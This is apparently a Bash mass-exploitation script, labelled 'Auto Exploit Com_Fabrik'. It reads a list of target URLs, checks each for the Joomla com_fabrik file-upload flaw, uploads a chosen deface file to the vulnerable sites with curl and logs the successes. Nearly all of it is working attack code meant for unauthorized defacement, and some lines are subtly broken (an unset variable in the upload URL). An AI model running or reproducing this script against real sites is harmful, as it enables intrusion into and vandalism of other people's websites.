Com_Fabrik

1. #!/usr/bin/env bash
2. # Auto Exploit Com_Fabrik
3. #Gila_Coders
4. clear
5. green='\033[1;32m'
6. red='\033[1;31m'
7. cyan='\033[1;36m'
8. white='\033[1;37m'
9. NC='\033[0m'
10. useragent="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/56.0";
11.  
12. printf "${green}Auto Exploit Com_Fabrik\n"
13. printf "${white}Blog : ${white} http://gilacoders.blogspot.com\n"
14. printf "${cyan}Code : Bash\n"
15. printf "${white}GILA ${green}CODERS\n"
16. printf "${NC}\n"
17. echo -e '\e[1;36m' ""
18. echo -n "NAME FILE LIST : "; read list
19. echo -n "NAME FILE DEFACE : "; read fdepes
20. jem=$list
21. #printf
22. while domath= read -r url
23. do
24.  
25. function checking()
26. {
27.     ngecheck=$(curl -q --connect-timeout 5 -X POST ${1}"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 2>&1 | egrep -o "filepath" );
28.         if [ "filepath" == "${ngecheck}" ]; then
29.         printf ${white};
30.             echo "VULN - $url";
31.         printf ${cyan};
32.             echo "SEDANG DALAM PROSES DEFACE..."
33.                 curl -q --silent $useragent --connect-timeout 10 -X POST -F file=@${fdepes} "${var}/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 2>&1
34.           printf ${NC};
35.         printf ${green};
36.             echo "BERHASIL => $url/${fdepes}" | tee -a hasil.txt
37.         printf ${NC};
38.         else
39.         printf ${red};
40.             echo "GAGAL - $url";
41.         printf ${NC};
42. fi
43. }
44. checking $url
45.  
46. done < "$jem";